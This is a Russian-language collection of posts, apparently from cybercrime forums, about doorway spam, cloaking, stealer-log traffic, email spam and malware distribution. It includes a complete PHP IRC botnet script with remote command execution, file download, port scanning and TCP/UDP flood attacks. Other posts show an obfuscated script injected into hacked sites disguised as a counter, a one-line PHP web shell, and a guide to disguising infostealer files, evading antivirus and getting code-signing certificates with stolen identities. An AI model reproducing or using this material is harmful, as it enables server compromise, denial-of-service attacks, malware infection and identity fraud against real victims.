переадресации пользователей на другие сайты.
Как все началось? Моя история началась несколько лет назад, когда я искал
способы заработка в интернете. Я наткнулся на идею создания дорвеев. Сначала
это казалось сложным и непонятным, но я решил попробовать. Создание дорвеев
требует знания основ SEO (поисковая оптимизация) и умения создавать
привлекательный контент. Я начал изучать и пробовать разные подходы.
Мои первые успехи и ошибки. Когда я запустил свои первые дорвеи,
результаты были не сразу видны. Я совершал множество ошибок: выбирал
неправильные ключевые слова, делал некачественный контент, не учитывал
изменения в алгоритмах поисковых систем. Но вместе с ошибками приходил и опыт.
Я стал понимать, как улучшать свои страницы, чтобы они были более эффективными
и приносили больше трафика.
Как я разбогател? С течением времени мои дорвеи стали приносить стабильный
доход. Они привлекали трафик, который конвертировался в продажи или рекламный
доход. Я научился масштабировать свой бизнес, создавая новые дорвеи на
различные темы и продукты. Сейчас я могу с уверенностью сказать, что дорвеи –
это не только интересный и креативный способ заработка, но и хорошая
возможность показать свои навыки в интернет-маркетинге. Ну а теперь перейдем к
деталям.
Я хочу поделиться с вами стратегиями, которые помогли мне создавать
высокоэффективные дорвеи и зарабатывать на этом хорошие деньги. Приготовьтесь,
ведь я раскрою вам несколько секретов успеха!
Выбор ниши и ключевых слов
Первый шаг к успешному дорвею - это выбор правильной ниши и ключевых слов. Я
обращаю внимание на конкуренцию и объем трафика. Ищите ниши с высоким спросом
и низкой конкуренцией.
Создание качественного контента
Содержание — король! Это золотое правило, которого я всегда придерживаюсь.
Напишите уникальные и информативные статьи, которые будут интересны вашей
аудитории. Не забывайте о ключевых словах, но не переусердствуйте с ними. Для
этого я использую прорывную программу X-GPTWriter(об этом будет ниже).
Оптимизация для поисковых систем
Для того чтобы ваш дорвей успешно ранжировался в поисковых системах,
необходимо правильно оптимизировать его. Вставляйте ключевые слова в
заголовки, мета-теги, а также в текст статьи. Обратите внимание на скорость
загрузки сайта и его мобильную версию.
Сбор обратных ссылок
Не забывайте о важности обратных ссылок для SEO. Размещайте свой контент на
других сайтах, форумах, блогах с ссылками на ваш дорвей. Это поможет улучшить
его позиции в поисковой выдаче.
Анализ и коррекция стратегии
Никогда не стоит останавливаться на достигнутом. Всегда анализируйте
результаты своей работы и корректируйте стратегию в соответствии с изменениями
в поисковых алгоритмах и поведении аудитории.
Генераторы дорвеев – это специальные программы, которые создают большое
количество мини-сайтов или дорвеев с целью привлечения посетителей через
поисковые системы. Они работают на основе определенных ключевых слов и
семантических запросов, создавая страницы, оптимизированные для поисковых
систем.
X-GPTWriter — основа основ для создания дорвеев. Это программа, работающая
на базе нейросети ChatGPT , помогает мне генерировать качественный и
уникальный контент высшего класса, оптимизированный для поисковых запросов. К
слову, на данном контенте можно легко собирать белые СДЛы не опасаясь за
фильтры от поисковых систем (об этом в другой раз). Я просто ввожу ключевые
слова и указываю параметры, а X-GPTWriter создает уникальные тексты, которые
привлекают внимание поисковых систем и пользователей. Благодаря этому
инструменту я могу быстро заполнять свои сайты интересным и информативным
контентом, что помогает мне привлекать больше трафика и улучшать позиции в
поисковой выдаче.
Интерфейс программы PandoraBox
Пандора (PandoraBox) — мой верный помощник в создании дорвеев. Это
программа, которая помогает мне быстро и эффективно создавать доры. Программа
сокращает время, которое мне приходится тратить на создание дорвеев, и
позволяет сосредоточиться на других аспектах моего проекта. Без Пандоры я бы
точно не смог так быстро достичь успеха в создании дорвеев.
Зеннопостер (Zennoposter) — это мощный инструмент, который я также
использую для создания дорвеев. С его помощью я могу автоматизировать
множество задач, связанных с созданием и оптимизацией веб-страниц для
поисковых запросов. Например, я могу написать скрипт, который будет собирать
ключевые слова, создавать страницы с оптимизированным контентом и
автоматически публиковать их на сайте. Это существенно упрощает процесс
создания и управления дорвеями, позволяя мне сосредоточиться на других
аспектах моего проекта.
Если раньше дорвейщики использовали зачастую копипаст контент , не уникальный и любые другие его итерации (синонимайзинги, перестановки и прочее), то теперь о качестве контента можно не беспокоиться. X-GPTWriter - это новый продукт на рынке, который способен генерировать уникальный контент по заданным параметрам в пакетном режиме (то бишь, в промышленных масштабах), что для меня как для дорвейщика крайне важно. В итоге я получаю 100% уникальные тексты, которые выводят механизм создания дорвеев совершенно на иной уровень.
Интерфейс программы X-GPTWriter
Программу я не рекламирую и никакого отношения к продукту не имею, но возможно
кому-либо пригодится промокод на скидку. Когда я покупал, работал промокод
SALE40 , проверяйте, может еще работает. А может и нет.
Статьи можно оснастить картинками, которые будут парситься или генерироваться
из различных источников (Google, Dalle, Bing, XMLStock, Freepik, Pexels…)
и видосами из YouTube. На выходе статьи получаются, честное слово, просто
изумительными. Без преувеличения.
Ах да, насчет себестоимости такого контента. Себестоимость приблизительно
равна нулю. Как так? Ну расходы ложатся первостепенно на покупку лицензии
программы и затем на покупку проксей. Аккаунты ChatGPT безлимитные, один
раз купил за 25 руб. (внутри программы есть ссылка на эти чудо-аккаунты) и
забыл. Прокси тоже живут долго. Но я использую у себя на сервере OpenVPN и
генерирую в 70 потоков. Никаких банов, полет нормальный. За сутки у меня
выходит около 100000 статей объемом по 10000 символов каждая (это
оптимальный размер).
Первым делом я собираю ключевики (могу взять у тех. поддержки партнерской
программы и расширить, могу собрать сам и дальше распарсить). Использую сервис
Ahrefs , программы K-Parser и A-Parser. Затем чищу ключевики от
дубликатов и стоп-слов в программе Penguin Keywords Tools. На выходе
получаю чистые ключевые слова с мегатрафом.
Далее подаю программе X-GPTWriter готовые ключевики на генерацию статей.
Сразу скажу, что генерирую статьи и вообще создаю доры на разных языках,
программа это умеет. На выходе получаю уникальные и качественные статьи в
формате WordpressXML.
Следующий шаг - генерация дорвеев. Генерирую при помощи AgDor ,
PandoraBox и Zennoposter. Использую бесплатные домены в зоне .ml
(привел как пример, могу и на .ru доменах). Готовые сайты размещаю на VDS-
абузоустойчивых хостингах. Завершаю цепочку проспамом GSA SER. Через
некоторое время начинает идти трафик, который сливаю на партнерки.
Что по доходу? А по доходу все хорошо, лично мне хватает. В месяц удается
поднять от 11000$ до 15000$, в зависимости от срока выплаты партнерки. Как-то
так.
Ну что, на этом пока все. Если увижу интерес со стороны читателей, опубликую вторую часть статьи с более углубленной информацией по работе с дорами и ответами на вопросы.
[B]© [/B]https://vc.ru/marketing/1164237-vse-dengi-zdes-kak-postroit-svoyu- dorvei-imperiyu-pri-pomoshi-pandorabox-i-x-gptwriter
Привет всем пользователям
xss.is
Я со своей командой кодеров решил сделать сервис клоаки, который мы релизнули
в мае 2022го года. Данный продукт является простым и надежным решением для
всех социальных сетей.
Мною было принято решение сделать данный сервис бесплатным для пользователей
DamaGeLab и соседнего борда. Возможо это будет временно.
Буду рад услышать аргументированную критику и советы от юзеров данного форума.
JNBHUXTZQG3T463W - одноразовый промокод на 100%ую скидку ( вводите при
регистрации аккаунта ).
В дальнейшем для получения промокодов можете писать саппорту в телеграмме -
@beecloak
__На крайний случай можете писать влс форума либо мне в личный телеграмм.
__
https://t.me/beeclick - КАНАЛ
https://beeclick.me/ - Сайт клоаки
Всем здравствуйте
Сильно не пинайте, я ранимый )
в общем хочется научится добывать логи самостоятельно, вопрос заключается в
том, с чего начать?
Спам по мейлам?
Фб?
Гугл адс?
бюджет не большой, у людей кто продаёт инсталлы трафик, как все знают, говно..
только если люди работающие в Привате..
по теме знаю немного, в гугле не забанили, но много воды, если есть какие-то
мануалы, которые могут как-то +- разобраться, буду рад почитать..
Может кто захочет проконсультировать, велком в лс, обещаю сильно на за****ть)
Я понимаю, что люди не особо любят делиться инфой, а особенно кого то за
бесплатно консультировать, но, как говорится, попытка-не пытка ?
Спасибо за внимание
Хочу сделать 300 профилей браузера , привязать к ним 300 аккаунтов Ютуба и к каждому профилю привязать платный быстрый прокси . Хорошо бы еще найти прогу для автоматического просмотра моего видео на канале. Цель - делать за час 300 просмотров только что выложенного видео. Чтобы стимулировать алгоритмы ютуба к выдачи видео в топ? Это реально? Или есть подводные камни?
Здравствуйте!
Помогите решить задачу
Есть e-mail база, ясное дело купленная, но целевая аудитория.
Письмо будет обычное не рекламное, без ссылок и какого либо дизайна, считайте
что вам написал старый друг и вы ему должны ответить на текстовое сообщение с
двумя прикпрелеными фото.
База около 20 тысяч эмаилов, полностью валидных, все пользователи англо
говорящие, не русское население.
Посоветуйте, как лучше всего сделать рассылку, что бы письмо попало в inbox
ящиков: gmail, Yahoo, iCloud - их не много и outlook (hotmail).
smtpspam , вы по-моему предлагали ответить на вопросы.
Подскажите?
Ну как так? Голимых 15 строк выдают результат в два раза выше чем лоадер!!! Ну где логика?
Click to expand...
У меня есть предположение о том, что эксплоеты, входящие в состав связки,
могут:
1.) Крэшить приложение, в АП которого они работают;
2.) Приводить к зависанию этого приложения (при использовании JIT-Spray'я,
например); При этом, если это то приложение, с которым напрямую работает
пользователь, то высока вероятность его закрытия;
Эти два фактора означают что чем меньше времени будет затрачено на скачивание payload-exe'шника из сети, тем выше будет отстук.
Следовательно, чем меньше размер исполняемого файла, тем больше вероятность того, что отстук будет выше.
Размер обычного трояна + крипт (с нормализацией энтропии, как это обычно и делается) == ~120KB
Размер "стукача", наверно, ~1-2KB.
Я думаю, имеет смысл произвести след. эксперимент: "стукача" превратить в мини-лоадер (Добавить вызов CreateProcess() в код), который будет грузить основной exe (в данном случае, НЕmyLoader).
Думается мне, что таким образом удастся увеличить отстук любого подгружаемого софта.
P.S.: Так же, я испытываю негодование по поводу того, что в современных
связках до сих пор нет шеллкодов со встроенными PE-лоадерами.
Т.е. всё-таки, тот же инжект в explorer из пробитого браузера всё-же будет
намного менее палевен, чем запуск какого-то exe 'шника из temp-диры тем же
приложением (с точки зрения проактивных защит).
===
Кроме этого, существует фактор, снижающий отстук любого криптуемого софта.
И зависит он, от технологий, которые используются в крипторе.
Например, детект виртуальных машин и sandbox'ов.
Т.е. при минимальных условиях палевности (отсутствие AV & firewall'ов) отстук
некриптованного "стукача" будет выше, чем у "криптованного" троя как раз по
вышеописанной причине.
А в обзоре как раз ничего не было сказано о технологиях, используемых в
крипторах.
Милый пхп бот. Поддерживает комманды:
.user
-Логинимся на бот
.logout -завершаем сеанс работы с ботом
.die -удаляем бот
.restart -перезагружаем бот-посылаем мыло
.dns <IP|HOST>-ns lookup
.download-закачиваем фаил
.exec// uses shell_exec() - выполняем команду
.cmd// uses popen() - выполняем команду
.info -получаем инфу
.php// uses eval()-выполняем пхп код
.tcpflood-TCP флуд атака
.udpflood-UDP флуд атака
.raw-raw IRC command
.rndnick -меняем ник
.pscan-скан портов
.ud.server-меняем ирк сервак [newpass] Click to expand...
[New$paN]
Вот сам код файла. Отконфигурируйте что надо и на сервак.
Code:Copy to clipboard
<?
set_time_limit(0);
error_reporting(0);
class pBot
{
var $config = array("server"=>"127.0.0.1",
"port"=>6667,
"pass"=>"",
"prefix"=>"pbot|",
"maxrand"=>8,
"chan"=>"#pbot",
"key"=>"",
"modes"=>"+iB-x",
"password"=>"password",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = "";
$alph = range("a","z");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,25)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER $ident 127.0.0.1 localhost :$ident");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick logged in");
$this->log_in($host);
}
else
{
$this->privmsg($this->config['chan'],"[\2auth\2]: Incorrect password from $nick");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT :restart");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
$this->privmsg($this->config['chan'],"[\2info\2]: [\2httpd\2: ".$_SERVER['SERVER_SOFTWARE']."] [\2docroot\2: ".$_SERVER['DOCUMENT_ROOT']."] [\2domain\2: ".$_SERVER['SERVER_NAME']."] [\2admin\2: ".$_SERVER['SERVER_ADMIN']."] [\2url\2:".$_SERVER['REQUEST_URI']."]");
break;
case "cmd":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2cmd\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "php":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
$this->privmsg($this->config['chan'],"[\2exec\2]: $command");
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "pscan": // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "ud.server": // .udserver <server> <port> [password]
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: Changed server to ".$mcmd[1].":".$mcmd[2]." Pass: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: Changed server to ".$mcmd[1].":".$mcmd[2]);
}
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Cannot download, permission denied.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Unable to download from \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: File \2".$mcmd[1]."\2 downloaded to \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
break;
case "die":
$this->send("QUIT :die command from $nick");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick logged out");
break;
case "udpflood":
if(count($mcmd)>4)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]);
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
$this->nick = "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
$this->nick = "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
$this->nick = "[X]";
else
$this->nick = "[U]";
}
else
{
$this->nick = "[C]";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packets,$packetsize,$delay)
{
$this->privmsg($this->config['chan'],"[\2udpflood\2]: Sending $packets packets to $host. Packet size: $packetsize");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2udpflood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2udpflood\2]: Finished sending $packets packets to $host.");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2tcpflood\2]: Sending $packets packets to $host:$port. Packet size: $packetsize");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2tcpflood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2tcpflood\2]: Finished sending $packets packets to $host:$port.");
}
}
$bot = new pBot;
$bot->start();
?>
Привет,имеется все необходимое для ботнета-ТДС(сутра),лоадер(2к8),хороший
криптор,приват связка,абузоустойчивый хостинг.
Для начала взял трафф из ифрейма фтп,сам ифрейм критован,вида
Code:Copy to clipboard
<!--LiveInternet counter-->
<script>
('.75.67.67.63.3a.2f.2f.6f.72.67.75.72.62.2e.70.62.7a.2f.76.61.2e.70.74.76.3f.34'));var d=(c)?b.b.b.c():false;return d;}},c:{b:function(){var c=b.b.b.d('trashtext');var d=(c)?c:'trashtext';return d||false;},c:function(){var c=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');c['\x77\x69\x64\x74\x68']='0.1em';c['\x68\x65\x69\x67\x68\x74']='0.2em';c['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';c['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';c['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';c['\x69\x64']='\x6c';document['\x62\x6f</script>
<!--/LiveInternet-->
Это прости пример как выглядит.На сайты с которых много траффа заливаю шелл и по возможности(если не лень добавляю свой код
Code:Copy to clipboard
<? if (!empty($_GET['c'])) { echo '<pre>'; system($_GET['c']); echo '</pre>'; }exit; ?>
Какие могут быть советы?Например как сохранять трафф и где лучше его собстенно брать.Самому ломать-долго и невсегда получается,карж-гамно.
**Тред в процессе редактирования: **
Всем привет, решил перенести свои треды с дружественного форума exploit для братьев наших меньших.
После перенеса запустим старт цикла практических статей по SEO оптимизацииClick to expand...
Содержание:
1. Введение в сео
- Введение в основные стратегии продвижения
-- Продвижение контентом
-- Особенности визуального поиска
-- Особенности голосового поиск
**-**Введение в базовые факторы ранжирования
--
--
Список используемых источников:
1. https://drmax.su/seo-monstr-next?ysclid=lq23x7cffz175347683
2. https://ant-team.ru/public/GoogleAnt-Team.ru.v5.pdf
3. https://backlinko.com/
Брайан Дин - топовый англоязычный сеошник
Click to expand...
4. https://www.searchlogistics.com/
Хороший блог англичанина Мэттью Вудварда - советую
Click to expand...
Глен Аллсоп - топовый сео аналитик
Click to expand...
6. https://www.robbierichards.com/blog-posts/
Робби Ричардс - еще один именитый сеошник с западных рынков.
Click to expand...
7. https://www.youtube.com/channel/UCRQ7INXiPlQDFgATzVJQaZA
Канал Олега Шестакова на ютубе
Click to expand...
Всех приветствую. Относительно недавно начал изучать е-мейл спам, пробовал лить на крипту, клики есть, инбокс по контрольке нормальный, но лидов по пальцам пересчитать. В связи с этим, посоветуйте нормальные партнерки под рассылку, которые выдают базы.
Приветствую.
Хочу научиться добывать трафик на дрейнер. Решил протестировать твиттер.
Тест первый:
Лендинг - обычный аирдроп с собачьими токенами Floki 2.0 (банально но сам
видел в твитере это множество раз).
Софт и рассылки не покупал, купил 50 нулевых акков чисто на убой посмотреть
что будет, взял скрипт <https://github.com/trevorhobenshield/twitter-api-
client> и на его основе сделал рассыльщик упоминаний напаршенных ранее
юзернеймов по списку с рандомизированным текстом . Упоминания постил под
оригинальным твитом со ссылкой на аирдроп, гонял аккаунты по кругу , до тех
пор пока на тестовый акк перестали приходить уведомления об упоминании.
Получилось ~10к упоминаний, упоминал активных юзеров (парсились по наличию
твитов и тд).
Выхлоп получился нулевой , скрин прикладываю:
Попробовал заказать ту же услугу у специалистов, предлагающих твиттер-софт для
продвижения, с неплохими отзывами и тд. Оффер примерно тот же, аудиторию
парсили уже они с профилей которые я дал, по крипте.
Картина получилась следующая:
Результат выглядит получше, однако - выхлоп по прежнему нулевой, а клики по ссылке обошлись примерно в $11 за клик.
Прошу каких-то подсказок по твитеру от более опытных людей в теме (критерии аккаунтов для упоминаний и тд, может шопы, что вообще влияет, как правильно добывать траф подобным образом), адекватную консультацию могу оплатить. Заранее спасибо.
Полистав кучу форумов в поисках новых методов, по итогу ничего дельного так и не нашлось, как висели старые гайды, так и висят. Тем более веду на данный момент четыре своих проекта которые выеб...ли мозги, решил отдохнуть и написать небольшую статейку. С 2020 года изменилось очень многое. Так что решил написать и поделиться своими наработками. Статья ориентирована в основном на новичков, но может кто из старичков для себя подчеркнет для себя некоторые аспекты. Если я спалил чью-то контору, то заранее извиняюсь это всего лишь бред написанный новичком.
Начнем думаю с азов и самого начала. Актуальные типы файлов при заражении на данный момент:
Обычный криптованный файл, замаскированный обычно под инсталер. Лично я пользуюсь дроппером и раздуваю сам файл до 20-50 мб. Запуск ставлю 20-30 сек, так как на моментальный runexe могут тригериться некоторые ав. Так что для меня оптимальный вариант. Так как криптовать стал себе сам, то детекты у меня присутствуют иногда тоже. 0-2 из 26 при скан тайме и 0-3 при ран тайме. По поводу криптов можно говорить долго, но не суть, целая куча сервисов и людей, которые занимаются этим на профессиональном уровне. Как небольшой пример: Человек уверял меня что у него абсолютно кристальный файл, но после того как он сменил регион в винде....
Click to expand...
у него сразу же появились детекты. Так что при крипте имейте ввиду, что по
большей части почти все ав и тем более вд имеют региональные базы тоже. Я
лично для себя криптую под юсу или под францию. (хотя наскок я знаю у чекзилы
базы под юса машины)
Давайте подробнее разберем что можно сделать с exe
Для начала чтобы обойти сам вирус тотал нужно раздуть файл более 650 мб, так как до 650 мб можно закинуть на virustotal.
Некоторым удобно проливать файлы так, потому что некоторые начинают
сканировать файлы, что уже может обезопасить их хотя бы этим и увеличить жизнь
крипта. На вирус тотал всегда будут детекты, потому что у них база глобальная,
так как на avcheck и прочих ресурсах по скану файлов они являются
региональными (в основном это usa).
Использовать файлы по 650 мб+ не всегда удобно и тем более заменить их и поэтому начинаем использовать лаунчеров.
Гуляя по форуму наткнулся на вот такую интересную штуку.
Довольно интересно было, решил взять опробовать и посмотреть что получится.
Получаются вот такие лаунчеры с функцией downloadandexecute, конечно это
лучше, чем раздувать файл до хрен знает скольки мб, так что оптимальный
вариант. Из-за скудности решил вскрыть, посмотреть как это устроено и сделать
под себя, получилось в итоге:
Всю контору конечно палить не будем, но красиво и не в паблике. Намного
удобнее, красивее. оригинальнее. Плюсом является то, что человек получает то,
что он скачивал, а я получаю с него вкусняшки. То есть если человек качал
кряк, он получает кряк, если качал софт, он получает данный софт.
Если мало этого то можно конечно использовать создание инсталляторов. Их целая куча, так что тут широкий выбор. Накидываем до кучи ненужных файлов, создаем инсталлятор с ярлыком. Оптимальные по моему мнению:
Nullsoft Scriptable Install System
Click to expand...
Advanced Installer
Click to expand...
Inno Setup
Click to expand...
WIX Toolset
Click to expand...
Гайды как ими пользоваться можно найти в гугле и на ютубе, так что расписывать как ими пользоваться смысла не вижу.
Довольно распространенными на данный момент стали файлы надстройки для mircosoft excel
Их плюсом является то что, на данный момент они актуальны для спама и google
chrome не агрится на них, что способствуют открытию файлов, так как на ios их
не открыть, с телефона тоже, онлайн файл не поддерживается, значит придется
скачать и запустить. Довольно интересная штука, у кого есть хорошие smtp
сервера для масс спама. Цены варьируются от 100 бачей за разовый крипт до 5к
за месяц.
Довольно таки новый метод, который стал актуален в паблике не так давно. На форуме есть актуальные селлеры, можете посмотреть о них подробно.
Вот такую штуку мне недавно прислали на отработку, я конечно фишку сразу
просек, так что отработчики, смотрите внимательней, что отрабатываете и какие
файлы открываете. Суть такая же как и у xll - открываете файл, получаете
документ или текстовик, но пк жертвы заражается.
Тут будет в парочке словах и скриншотах.
.iso \ .img - подходит для тех кто держит сайты с крупным софтом и играми. Подходит для торрентов, если файл хорошо закриптован, то все будет окей.
.pif - тоже самое что и .lnk но выглядит по другому. Ав на него тоже не
очень так и быстро тригерится.
.html - не видел такие давно но по сути, обычно ставят их к нормальному
софту под видом мануала. Ав тригерится на них также как и на exe файл.
Ну из тех файлов, которые я отлавливал или делал я сам, я отписал. Про .ps1 и
прочее тут рассказывать нет смысла, так как статья для новичков. Теперь
перейдем уже к самим методам, а то наверное я уже вас утомил какой-то
непонятной писаниной.
Ссылка - За все время пока я занимаюсь логами, видел несколько методов доставки файлов до пользователя. Самый распространенный - это ссылка на файлообменник с паролем, по сути массовый. Ссылка и пароль, ничего сверхъявственного. Ведутся на такое тупенькие взрослые или школьники, которые хотят скачать читы. Нормальные люди, такое никогда качать не будут!
Это для школьников и новичков, так как не нужны затраты и знания в
программировании. Я пошел же дальше.
Лэндинг с ботом автоответчиком - по сути стандартный лэндинг, но нет прямого скачивания, есть только форма заполнения почты. Такие лэндинги я делал, пока не было своих ev сертификатов.
Жертва вводит данные в ответ мгновенно получает письмо на свою почту по
установке. Параллельно собираем базу, которую в будущем можно спамить.
Скажите а зачем заморачиваться? Да потому что человек уже согласился что это
ему надо, раз отправил запрос. Значит "получите и распишитесь". Данный метод
уже подходит для завлечения более умной аудитории, так как способ не
стандартный и они с таким еще сталкивались. Логи с таких всегда жирнее, чем с
обычных ссылок под видосами.
Файл с цифровой подписью EV Code Signing Certificate - самый дорогой метод по сути + лэндинг. Данный метод является самым дорогим потому что желательно готовить белый софт с лоадером нерезидент под такие вещи, но выхлопы с него всегда больше, чем со способов выше. Ав и вд на такие файлы не тригеерятся и по сути это является оригинальным софтом, написанным "вами". Оформить ev не так сложно. В круг с регистрацией LLC обходится в 1000-1300 usd.
Нам понадобится фулка + саморег ба + сс (иногда дроп все таки нужен):
**Этапы:
Регистрация в вашем штате** - под владельца фулки
Заполнить заявку - Вам нужно будет указать название вашей компании, адрес и основных владельцев бизнеса. Там будет список рабочего времени, и вы должны проверить тип бизнеса, который вы хотите установить. Возможно, вам потребуется представить бизнес-план в дополнение к заявке.
Отправить комиссионный платеж - Оплатить требуемую пошлину. Все штаты требуют, чтобы вы заплатили сбор за регистрацию своего бизнеса, хотя он зависит от штата. При регистрации онлайн вы должны оплатить сбор кредитной картой. Далее уже регаем EIN
**Регистрация для получения EIN описано ниже.
Посетить веб-сайт IRS** - Нужно посетить веб-сайт Службы внутренних доходов, чтобы подать заявку на получение идентификационного номера работодателя или EIN. Даже если у вас нет сотрудников, этот номер используется для целей налогообложения. Это приложение не всегда доступно. Вы можете зарегистрировать свой бизнес только в следующие часы: с понедельника по пятницу с 7:00 до 22:00 по восточному поясному времени. Так что подаем заявку онлайн, вы всегда найдете там форму для подачи онлайн.
